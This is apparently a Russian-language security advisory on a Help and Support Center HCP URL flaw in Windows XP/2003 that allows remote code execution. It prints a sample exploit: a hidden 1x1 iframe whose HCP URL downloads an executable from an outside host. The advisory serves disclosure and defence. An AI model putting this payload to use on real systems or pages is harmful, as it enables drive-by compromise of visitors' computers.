Программа: Windows XP/2003 

Уязвимость обнаружена в Help and Support Center в обработке HCP URL. Удаленный атакующий может скомпрометировать уязвимую систему.
Удаленный атакующий может сконструировать специально обработанный HCP URL, который выполнит произвольный код в браузере пользователя, посетившего злонамеренный Web сайт или просмотревшего злонамеренное email сообщение. 

Пример: 

<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm? website=exploitlabs.com/msnspoof/poc/
dvdupgd/dvdupgd.exe" width="1" height="1">
</iframe>



Оставить мнение